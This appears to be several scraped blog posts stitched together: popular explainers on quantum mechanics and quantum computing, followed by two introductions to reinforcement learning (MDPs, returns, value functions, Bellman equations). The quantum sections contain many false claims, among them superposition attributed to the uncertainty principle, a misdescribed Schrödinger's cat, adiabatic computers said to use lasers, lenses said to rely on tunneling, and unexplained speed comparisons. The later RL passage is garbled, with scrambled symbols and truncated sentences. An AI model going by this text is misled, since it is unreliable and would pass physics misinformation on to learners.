One great way to understand quantum mechanics is through examples! Let's take electron interference as an example. In quantum mechanics, it's possible for particles like electrons and photons to interfere with each other! This means that they can come together and their quantum waves will combine: these quantum objects are said to be coherent. We even see this kind of interference in everyday life- if you take two metal plates and put them close enough together, light coming from one side will bounce off both plates at once before heading out into space on the other side. The result? You'll get some regions that look very bright (where lots of light interfered constructively), and some darker regions where there wasn't as much interfering going on (where lots of light interfered destructively). This is quantum interference (constructive and destructive interference) at work!

There are three main interpretations of where particles were just before they're measured: realistic, orthodox, and agnostic.

**Realistic interpretation:** The wave function exists independently of any observer or measuring device. It describes a physical reality that exists beyond our ability to measure it.

**Orthodox interpretation:** The wave function only exists when it's being observed. It's a tool used to predict probabilities but doesn't have any real existence outside of this context.

**Agnostic interpretation:** There is no right answer to this question! Some people believe quantum mechanics is real while others think it's just a math game.

It's up to the individual to decide what they believe.

Which interpretation you choose really depends on your personal beliefs about quantum mechanics. No one interpretation is right or wrong- it's all a matter of perspective!

Quantum mechanics is a very complex topic and there are many different interpretations of what it means. In this blog post, we've talked about the wave function in quantum mechanics- what it is and how it works. We've also looked at Schroedinger's Equation and the different interpretations of it, as well as the three main positions on where particles were just before they're measured. I hope this gives you a better understanding of quantum mechanics and its complexities! Thanks for reading!

]]>In classical physics, everything has a definite position at any given time based on the laws of physics. If you know the position and velocity of all the particles in a system, you can predict its future behavior. But quantum mechanics turns this idea on its head! In quantum mechanics, particles don't have definite positions until they are observed. This is called the Heisenberg Uncertainty Principle. The most famous example of the Heisenberg Uncertainty Principle is called Schrodinger's Cat. In quantum physics, a box contains either a cat or radioactive material that will release poison gas if it decays during the experiment. The question of whether or not there is a live cat in this particular box can only be answered by opening the box to see! This isn't because we don't know the position and velocity of all the particles of the cat, it's just how things work at this level. Scientists like Erwin Schrodinger came up with thought experiments to explain quantum mechanics concepts without having to actually do them (because they are really hard!).

There are many other strange concepts in quantum mechanics, but two of the most important are superposition and entanglement. A particle can exist in multiple positions at once due to the Heisenberg Uncertainty Principle! For example, an atom could be spinning clockwise and counterclockwise simultaneously until it is observed. This phenomenon allows for incredible computing power that traditional computers just cannot do today. There have been some experiments done with quantum teleportation-a way to send information instantaneously across vast distances while observing a particle's position or momentum (which would destroy any messages being sent). Quantum teleportation has not yet been achieved on macroscopic levels due to how hard it is to observe these particles without disturbing them, but the theory is sound!

One of the most important implications of quantum mechanics is that particles can exist in more than one state at the same time. This is called a superposition. In traditional computing, each bit is either a 0 or a 1. But in quantum computing, each qubit (quantum bit) can be both a 0 and a 1 at the same time! This opens up all sorts of possibilities for calculations that are much faster than classical computers can do today. To take advantage of this fact, quantum computers use something called Shor's Algorithm to factor large numbers quickly. Traditional computers would take years to break down large numbers into their prime factors, but quantum computers can do it almost instantly! There are other algorithms that also work better on quantum computers, but this is the one that everyone knows about because it was proposed by Peter Shor of Bell Labs in 1994.

Quantum computing should not be confused with regular old classical computer programming! Quantum physicists use different computational algorithms based on quantum mechanics to take advantage of how particles work at the smallest levels. There are other forms of computation like molecular and DNA computing-but these aren't as well known or used often today (mainly due to their difficult nature). We won't go into any more detail about how they work here, but you can read up on them if you want! There are two main types of quantum computers called gate model QC's and adiabatic QC's. Gate model quantum computers are the more popular type and work by taking a set of qubits in one state, applying a series of mathematical transformations (called gates) to them, and then measuring the output. This process is repeated until you get the result that you want. Adiabatic QC's are similar, but they use lasers instead of gates to change the state of the qubits. They are not as well developed yet, but they could be more stable in the future!

Now that we know some basics about quantum mechanics and how it is used in quantum computing, let's take a look at how quantum computers actually work! In order for traditional computers to do calculations, they need data to be saved in a binary format called bits. Bits can be either 0 or l and are the fundamental pieces of data that allow your computer to do anything at all! Quantum computers, however, use quantum bits (called qubits) which have more complex properties than regular old bits. A single qubit can exist as both zero and one simultaneously-but collapses into just a zero or just a 1 when observed! This means that instead of having only two states like normal computers, quantum computers have an infinite number of possible combinations for storing information. In order words, they have superpowers compared to traditional computing devices :) That's not even the coolest part thoughbecause particles also behave differently under observation from how they normally do on their own accord, quantum computers can process information without disrupting it. This is called superposition, and means that the qubits are able to work together on a calculation even while they are not being observed!

In order to help you understand more about how quantum computing works compared to traditional computer programming, here are two examples! Both represent everyday problems and compare how long they would take on classical or quantum devices. The results are pretty impressive :)

**Classical Time:** 60 seconds

Quantum Computing Time: 0.000000000000001 seconds

**Classical Time:** 66 years

**Quantum Computing Time:** 0.000000000000000001 second

**Classical Time:** 31,500 years

**Quantum Computing Time:** 35 minutes and 20 seconds

As you can see, quantum computers are way faster at solving problems than traditional computers! This is because they take advantage of the strange but amazing world of quantum mechanics to do multiple calculations at once. Even though they are still new and not as well developed as classical devices, quantum computing has huge potential for the future! Stay tuned for more updates :)

There are some limitations to quantum computing that still need to be addressed before the technology is ready for use by everyday people. First, qubits themselves can only maintain their special properties if they are super cold-which means that most of them have to operate at less than 0 degrees Celsius! This makes it really difficult to build a large enough computer with these parts because you would need hundreds or thousands of refrigerators all over your house just so everything could work together :) Another problem is reliability-quantum computers aren't completely reliable yet and will sometimes give incorrect results due to errors in calculations. Scientists are working on this though, meaning that once things like error correction software become better developed this shouldn't be an issue anymore. Quantum Computing is the Future! Despite these limitations, quantum computing is still a rapidly developing technology with tons of potential. In fact, some people are saying that it could eventually take over traditional computing altogether! Just think about how your life would be different if you had a quantum computer instead of a regular one-you could do your schoolwork in seconds, find information online instantly, and never have to worry about storage space again because everything could be saved in the cloud!

The most important thing to take away from this article is that quantum mechanics deals with very small particles of matter (like atoms or photons) at their tiniest levels-and how their behavior doesn't always make sense when you apply traditional concepts like "cause and effect" to them. Quantum effects have been seen in larger things too though, so don't think it's just some nerdy physics concept that only scientists care about! For instance, optical lenses use quantum tunneling where light can pass through a small opening because the particles don't have to go in a straight line. We use quantum mechanics every day without realizing it! For example, lasers wouldn't work without quantum mechanics (the photons would just keep going off in random directions if they weren't for the laws of quantum mechanics). GPS systems also rely on special relativity and quantum mechanics to calculate your location. So as you can see, this branch of physics is pretty important :) That's all for today's article! I hope you learned something new and interesting about quantum mechanics and how it is used in modern quantum computing. Be sure to check out some of the other articles on our website for more information, or leave us a comment if you have any questions!

]]>To start off, we will once again begin by examining the agent-environment duality. An RL problem is defined by both the **environment** and the **agent**, whose actions affect the related environment. We can now define the interaction of both: given a **state** \(s \in \mathcal{S}\) it is the agents task to choose an **action** \(a \in \mathcal{A}\). The environment will then give a **reward** \(r \in \mathcal{R}\) to the agent and determine the next state \(s' \in \mathcal{S}\) based on the state \(s\) and the action \(a\) chosen by the agent. While doing so \(\mathcal{S}\) constitutes the set of all possible states, \(\mathcal{A}\) the set of all possible actions, and \(\mathcal{R}\) the set of all possible rewards. The following figure illustrates this relationship.

If we now define \(s_1\) as the starting state and \(r_t, s_t, a_t\) as the state, action or reward at timestep \(t = 1, 2, \ldots, T\) fulfilling the constraint that \(s_T\) is a terminal state, we can define the entire sequence of interactions between agent and environment, also called an **episode** (sometimes called "trial" or "trajectory"), as follows:

$$ \tau := (s_1, a_1, r_2, s_2, a_2, r_3, \ldots , r_T, s_T) $$

Note that \(s_t, a_t, r_t\) can also be denoted by capital letters \(S_t, A_t, R_t\).

The environment can be modeled using a transition function \(P(s', r | s, a)\) representing the probability for transition to \(s'\) in the next state and gaining reward \(r\), given that the agent choses action \(a\) in the present state \(s\). Using the transition function we can also derive the state-transition function \(P(s' | s, a)\) as well as the reward function \(R(r | s, a)\):

$$ P(s' | s, a) := P_{s, s'}^a = \sum_{r \in \mathcal{R}} P(s', r | s, a); $$

$$ R(r | s, a) := \mathbb{E} [ r | s, a ] = \sum_{r \in \mathcal{R}} r \sum_{s' \in \mathcal{S}} P(s', r | s, a); $$

where \(R\) is the expected value for reward \(r\) given state \(s\) and action \(a\). A single **transition** can thus be specified by the tuple \((s, a, r, s')\).

Given an episode \(\tau\) and the transition function \(P(s' | s, a))) we get the following relationship:

$$ s_{t+1} \sim P(s_{t+1} | s_t, a_t) = P(s_{t+1} | s_t, a_t, s_{t-1}, a_{t-1}) = P(s_{t+1} | s_t, a_t, s_{t-1}, a_{t-1},...,s_1, a_1) $$

Therefore, \(s_{t+1}\) only depends on timestep \(t\) and the corresponding state-action pair \((s_t,a_t)\). In other words, the future state is independent of the past but depends on the present. This property is also called the **Markov Property** and enables us to interpret RL problems as **Markov Decision Processes** (MDPs). While this is not important for elementary algorithms, more advanced approaches utilize this view and its mathematical implications to refine the learning process.

Depending on the agent's knowledge about the **transition function** \(P\) and the **reward function** \(R\), we classify RL algorithms as:

**Model-based**: The agent knows the environment. This can be further subdivided into:- Model is given: The agent has complete information regarding \(P\) and \(R\). AlphaGo can be seen as such an example as the program has complete information regarding the Go rules.
- Model is learned: While \(P\) and \(R\) are not known in the beginning, the agent learns these functions as part of the learning process.

**Model-free**: \(P\) and \(R\) are neither known nor learned by the agent. Agent57 (the successor of DQN) developed by Google DeepMind falls into this category as the agent plays 57 different Atari games, showing a superhuman performance by learning only using high-dimensional sensory input in form of screen pixels.

As stated above, the goal of the agent is to choose the best action \(a\) given state \(s\). This goal can be formalized using a function \(\pi\), also known as **policy**. In general the policy can take one of two forms:

- deterministic: \(a = \pi(s)\) (also denoted by \(\mu (s)\)
- stochastic: \(\pi(a | s)\) represents the chance that \(a\) is chosen given state \(s\). In this case the derived action is denoted by \(a \sim \pi(\cdot | s)\).

As a result, the goal of RL algorithms is to develop a policy \(\pi\) which converges to the optimal policy \(\pi_*\). One of the main differences between algorithms is the method used to determine this policy \(\pi\).

To gain a better understanding of these methods it can be helpful to imagine how a human would go about formulating a strategy in such circumstances. The most intuitive way is to study RL problems using a game-theoretical point of view, meaning that the program effectively replaces a human player.

One approach is to assign each state a corresponding value measuring how "good" the state is concerning future rewards. As a result, the strategy becomes to always take the action promising the highest value. This concept is also known as **state-value function** \(V(s)\) (or simply **value function**).

Yet before we can define \(V(s)\) in formal terms, we need to define the future reward also denoted as **return** \(G_t\) measuring the discounted rewards of an episode:

$$ G_t := r_{t+1} + \gamma r_{t+2} + \gamma^2 r_{t+3} + \ldots = \sum_{k = 0}^\infty \gamma^k r_{t+1+k} $$

The above term for \(G_t\) is called the **infinite horizon discounted-return**. In comparison, we get the **finite horizon discounted-return** if the sum is bounded by a finite parameter \(T\).

Here, \(\gamma \in [0, 1]\) is a hyperparameter discounting future rewards by their distance. Using \(\gamma\) has multiple practical reasons, as we may prefer immediate benefits over drawn-out ones (such as winning a game quickly). Furthermore, this provides mathematical advantages when encountering loops in the transition sequence. As a result, we can define \(G_t\) as follows:

$$ G_t = r_{t+1} + \gamma r_{t+2} + \gamma^2 r_{t+3} + \ldots $$ $$ = r_{t+1} + \gamma (r_{t+2} + \gamma r_{t+3} + \ldots) $$ $$ = r_{t+1} + \gamma G_{t+1} $$

Now, using the return \(G_t\) we can define \(V(s)\) as:

$$ V(s) := \mathbb{E}[G_t | s_t = s] $$ $$ V_\pi(s) = \sum_{a} \pi(a | s) \sum_{s', r} P(s', r | s, a) (r + \gamma V_\pi(s')) $$

Note the dependency of \(V(s)\) on the episode or policy.

The second equation here is also called the **Bellman equation**. Therefore, a policy is required to determine the state-value function and we can define \(V_{\ast}\) to be the function generated by the optimal policy \(\pi_*\). In sequence, if \(V(s)\) is given we can derive a greedy policy \(\pi\) :

$$ \pi(s) = \arg \max_{a} \sum_{s', r} P(s', r | s, a) (r + \gamma V(s')) $$

In other words, if we can state an algorithm computing \(V(s)\) such that it converges to \(V_{\ast}\), then this yields an optimal policy \(\pi_{\ast}\). This is the idea behind the **policy-iteration** algorithm, which alternates between generating a state-value function from a given policy and generating a policy using the state-value function.

Another possibility is to evaluate state-actions pairs, resulting in the **action-value function** \(Q(s, a)\). To this end, we define \(Q(s, a)\) in a similar fashion and connect both functions \(Q(s, a)\) and \(V(s)\) for a given policy:

$$ Q(s, a) := \mathbb{E}[G_t | s_t = s, a_t = a] $$

$$ V_\pi(s) = \sum_{a} \pi(a | s) Q_\pi(s, a) $$

$$ Q_\pi(s, a) = \sum_{s', r} P(s', r | s, a) (r + \gamma V_\pi(s')) $$

In this case, the **Bellman equation** is defined as:

$$ Q_\pi(s, a) = \sum_{s', r} P(s', r | s, a) (r + \gamma \sum_{a'} \pi(a' | s) Q_\pi(s', a')) $$

And the action-value function can also be used to generate a greedy policy:

$$ \pi(s) = \arg \max_{a} Q(s, a) $$

In theory, every problem solved using this framework can be interpreted as a simple planning problem, aiming to find an optimal solution to the Bellman equation, thus determining an optimal policy. In practice, however, the number of possible states and actions as well as the limited knowledge of the environment makes this approach unfeasible, thus enforcing us to find another way of computing the optimal policy. Therefore, algorithms tend to optimize the state-value function, the action-value function, or the policy using a straightforward approach. If the policy is optimized straightforward, we can describe the policy using a precise analytical function and solve the problem by optimizing a given set of parameters. This is what we describe in the following blog posts.

Since we have defined the most important terms, let us go more deeply into specific algorithms and approaches in the following posts.

Looking back to present breakthroughs in Artificial Intelligence (AI) and especially in RL, we observe rapid progress in Machine Learning (ML) without human supervision in a wide variety of domains such as speech recognition, image classification, genomics, and drug discovery. These unsupervised learning models are mainly motivated by the fact that for some problems human knowledge is too expensive, too unreliable, or unavailable. Moreover, the ambition of AI research is to bypass the need for human supervision by creating models that achieve superhuman performance without human input.

One popular example is AlphaGo, a computer program developed by researchers at Google DeepMind, which has been shown to surpass the abilities of the best professional human Go player in 2017. Very soon the model was beaten by a newer evolution of itself 100-0 without human supervision. Similar breakthroughs are to be found in the realm of E-Sports: For example, a team at OpenAI developed bots being able to beat human professionals in the highly competitive video game Dota 2 in a 5v5 game in 2019. So how not be curious about the magic behind RL? In the following, we will take you with us on a journey diving deep into the field of RL.

To understand the fundamentals of Reinforcement Learning it is important to understand one simple key concept: The relationship between an agent and its environment. To grasp the idea of an agent, it seems pretty natural to replace it with oneself

- a human being interacting with its surroundings, retrieving information about itself and those surroundings, and changing its state through actions over a finite time horizon.
Now the human being - representing the agent - usually has quite a wide variety of different actions we could take.
For example, imagine you have a walk with the dog: There are two options regarding clothing. We could either take a jacket or pass on doing so. To decide which of both options to choose,
it is pretty intuitive to observe the temperature outside - the environment so to speak. But how do we know if our decision was optimal? We will receive feedback - a reward - from the environment.
In our example, we might be freezing if we decided not to take the jacket and whether is quite cold or sweaty if it is too hot.
And that example - at its core - represents what the relationship between agent and environment is about.
More formally, the agent takes an action
in state*a*and collects a reward*s*in return to evaluate choice*r*, given the current state*a*. Finally, the system transitions into the next state*s***s'**, which is determined by a transition function.*P*

After introducing the key concept of the "agent - environment" relationship, we can introduce the two most basic cases regarding the agent's knowledge about the model describing its environment: Simply, knowing the model and not knowing the model.

Imagine a world, in which the weather is sunny exactly every other day and rainy on every remaining day. If our agent has to do some work outside, but can freely decide on which day he works on the respective tasks, knowing the world's model will probably cause the agent to work outside mostly on sunny days for a better outcome. On the other hand, if the model is not known to the agent he will probably finish his work on the first day to collect the reward, thus completing the task as soon as possible and learning the environment model as part of the learning experience itself.

In formal terms, we distinguish between model-free and model-based RL, meaning that in model-based RL, the model is known to the agent. This is why model-based problems can be solved using "simpler" algorithms and by Dynamic Programming (DP). In comparison, model-free RL enforces the agent to learn the environment model as part of solving the learning problem.

A policy \(\pi\) describes the strategy by which the agent chooses which actions to take in which state. The optimal policy returns the best possible action for each state to receive the biggest possible reward. Furthermore we differentiate a deterministic policy \(\pi\)(** s**) and a stochastic policy \(\pi\)(

Given state ** s** it doesn't seem too practicable to brute force action

**State**: Having an amount of money in your bank account.

**Action 1**: Withdraw the money now to buy yourself something.

**Action 2**: Leave the money in your bank account to earn more money through interest and buy yourself something more expensive in the future.

Both of these actions result in a certain reward. The key difference is that if you only consider the rewards up to the current time, action 1 has a much higher reward because you would buy yourself something right away while action 2 would reward you with nothing. But, action 2 will grant you a much higher reward in the future and this reward may outweigh the reward of action 1. The main point to look at when deciding between actions 1 and 2 is, whether waiting the additional time is worth the higher reward or not. And this is the major idea behind value functions.

Value functions are mostly referred to as ** V(s(t))** with

As a result, the value function is computed by the future reward, also known as **return**, which is a total sum of discounted rewards going forward. The discount factor, also denoted by \(\gamma\), is used to discount future rewards to not wait indefinitely or prefer rewards we receive in the near future. Back to our example, in case we wouldnt have such a discount factor, we might wait endlessly to buy a house because its reward would outweigh the rewards of all daily expenses like buying food for example.

Now we can use these value functions to update our policies converging to the optimal policy. We will encounter this principle as value iteration in a later post.

- Cover Image: Cover Image
- Blog by Lilian Weng: Lil'Log